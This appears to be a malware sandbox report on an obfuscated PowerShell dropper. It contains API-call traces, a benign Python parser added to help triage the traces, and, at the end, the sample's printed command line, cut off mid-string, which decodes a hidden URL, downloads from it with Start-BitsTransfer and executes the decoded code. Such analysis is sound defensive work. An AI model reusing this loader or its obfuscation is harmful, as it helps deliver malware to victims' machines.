console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x0000015f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000001a7
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x0000020f
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006953b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00694f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00694f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00694f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695d30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695d30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629c618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629c618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629ded0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02232000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02233000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02235000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02236000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ace000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
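Every NtAllocateVirtualMemory and NtProtectVirtualMemory row above targets process 2752 through process_handle 0xffffffff (the pseudo-handle for the current process) and asks for protection 64, PAGE_EXECUTE_READWRITE, and every CryptExportKey row asks for blob_type 6, which is PUBLICKEYBLOB in wincrypt.h. The Python below is an added example, not part of this report or of the ZeroBOX tooling, that parses the report's "API / key: value / Status Return Repeated" block layout and pulls out the rows a triage analyst reads first: RWX commits, RWX re-protections of existing pages, and the key-blob formats requested. The sample rows are copied (abridged) from the tables on this page; the function names and the Record class are my own.

```python
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass

# Windows SDK constants (winnt.h / wincrypt.h) behind the decimal values the report prints.
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
BLOB_TYPES = {1: "SIMPLEBLOB", 6: "PUBLICKEYBLOB", 7: "PRIVATEKEYBLOB", 8: "PLAINTEXTKEYBLOB"}

# Constructed sample: four rows copied (abridged) from this page, in the report's own
# layout: one reserve, one commit, one reprotect, one key export.
SAMPLE = """\
NtAllocateVirtualMemory
process_identifier: 2752
region_size: 2293760
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory
process_identifier: 2752
region_size: 4096
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory
process_identifier: 2752
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

CryptExportKey
buffer: <INVALID POINTER>
crypto_handle: 0x00694f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
"""


@dataclass
class Record:
    api: str
    args: dict[str, str]
    status: int      # the report's Status column, 1 = call succeeded
    ret: int         # the Return column
    repeated: int    # the Repeated column


def parse_records(text: str) -> list[Record]:
    """Split the report into records: an API name, key: value lines, then 'status return repeated'."""
    records, api, args = [], None, {}
    for line in map(str.strip, text.splitlines()):
        if not line:
            continue
        tail = re.fullmatch(r"(\d+) (\d+) (\d+)", line)
        if tail and api:
            records.append(Record(api, args, *map(int, tail.groups())))
            api, args = None, {}
        elif ":" in line:
            key, value = line.split(":", 1)
            args[key.strip()] = value.strip()
        else:
            api = line
    return records


def leading_int(value: str) -> int:
    """'64 (PAGE_EXECUTE_READWRITE)' -> 64; '0xffffffff' -> 4294967295."""
    return int(value.split()[0], 0)


def rwx_commits(records: list[Record]) -> list[tuple[str, int, bool]]:
    """Successful commits that are writable and executable from the start: (base, size, heap_dep_bypass)."""
    return [
        (r.args["base_address"], leading_int(r.args["region_size"]), r.args["heap_dep_bypass"] == "1")
        for r in records
        if r.api == "NtAllocateVirtualMemory" and r.status == 1
        and leading_int(r.args["protection"]) == PAGE_EXECUTE_READWRITE
        and leading_int(r.args["allocation_type"]) & MEM_COMMIT
    ]


def rwx_reprotects(records: list[Record]) -> list[tuple[str, int]]:
    """Already-mapped pages flipped to RWX: (base, length)."""
    return [
        (r.args["base_address"], leading_int(r.args["length"]))
        for r in records
        if r.api == "NtProtectVirtualMemory" and r.status == 1
        and leading_int(r.args["protection"]) == PAGE_EXECUTE_READWRITE
    ]


def export_blob_types(records: list[Record]) -> dict[str, int]:
    """Which key-blob formats CryptExportKey was asked for, by name."""
    names = (BLOB_TYPES.get(leading_int(r.args["blob_type"]), "?")
             for r in records if r.api == "CryptExportKey")
    return dict(Counter(names))


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("RWX commits:   ", rwx_commits(recs))
    print("RWX reprotects:", rwx_reprotects(recs))
    print("Key exports:   ", export_blob_types(recs))
```

Reserve-only rows (allocation_type 8192, MEM_RESERVE) are deliberately left out of rwx_commits: a reservation maps nothing yet, and it is the MEM_COMMIT rows that hand the process executable, writable pages. Running this over the full tables on the page rather than the four sample rows gives the per-page breakdown of the 0x021e0000 to 0x05040000 commits.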
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. 
